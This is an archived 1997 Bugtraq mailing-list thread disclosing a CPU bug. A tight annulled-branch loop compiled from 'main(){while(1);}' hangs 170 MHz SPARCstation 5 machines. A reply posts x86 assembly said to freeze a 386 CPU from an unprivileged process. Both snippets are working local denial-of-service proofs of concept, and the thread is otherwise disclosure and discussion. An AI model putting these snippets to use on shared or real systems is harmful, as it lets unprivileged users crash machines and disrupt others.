Sparc CPU DoS


From mycroft@MIT.EDU Sat Oct 25 10:51:27 1997
Date: Fri, 24 Oct 1997 13:42:32 -0400
From: "Charles M. Hannum" 
To: BUGTRAQ@NETSPACE.ORG
Subject: Cute SPARC CPU bug

Compile the following:

main(){while(1);}

with `gcc -O' on a SPARC.  You get, roughly:

L1:
        b,a L1
        retl

Run it on a SS5/170.  Notice the machine is completely wedged.
Power-cycle it.

From mycroft@MIT.EDU Sat Oct 25 10:51:33 1997
Date: Fri, 24 Oct 1997 13:43:13 -0400
From: "Charles M. Hannum" 
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Cute SPARC CPU bug

Forget to mention...

The previous was pointed out to me by Frank van der Linden
.

=-=

From mycroft@MIT.EDU Sat Oct 25 10:53:05 1997
Date: Fri, 24 Oct 1997 20:23:57 -0400
From: "Charles M. Hannum" 
To: BUGTRAQ@NETSPACE.ORG
Subject: More info on SPARC CPU bug

I have so far only been able to reproduce the hang on 170 MHz SS5s.  I
have *not* been able to reproduce it on 85 MHz SS5s, 110 MHz SS4s,
Ultras, Classics, or pre-4m machines.

Specifically, the CPU that hangs is identified as a MB86907 (made by
Fujitsu), running at 170 MHz.  It hangs when running the same code
under either Solaris 2.5.1 or NetBSD 1.3_ALPHA, so I believe the bug
is not OS-related.

As far as I can tell, the CPU wedges completely; all response from I/O
peripherals is dead, including L1-A on the keyboard and break on a
serial console.

To review, the sequence of instructions that causes the hang is:

L1:
        b,a L1
        retl

I have not exhaustively tested other instructions in the branch delay
slot, but `ret' and `nop' also appear to `work' (i.e. cause the hang).
It appears to be the branch instruction alone that's responsible for
the hang.  A non-annulled branch does not have the same effect.

=-=

From dk@GENESYSLAB.COM Sat Oct 25 10:52:55 1997
Date: Fri, 24 Oct 1997 15:40:18 -0700
From: "Dmitry Kohmanyuk [KOI8-R] 
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Cute SPARC CPU bug

On Fri, Oct 24, 1997 at 01:42:32PM -0400, Charles M. Hannum wrote:
> Compile the following:
>
> main(){while(1);}
>
> with `gcc -O' on a SPARC.  You get, roughly:
>
> L1:
>         b,a L1
>         retl
>
> Run it on a SS5/170.  Notice the machine is completely wedged.
> Power-cycle it.

don't have a SS5 to crash, but just to add to CPU bugs topic...

gcc_compiled.:
.lcomm _c.0,40
.text
        .align 2
.globl _main
_main:
        pushl %ebp
        movl %esp,%ebp
        movl $0,%eax

        pushaw
        popaw
        movl _c.0(%eax,%eax,4),%ebx

        pushl   $0
        call    _exit

        leave
        ret

this hangs 386 CPU solid.  Non-privileged.
Change _main to main to taste.

Ah, my PDP-11 assembly days...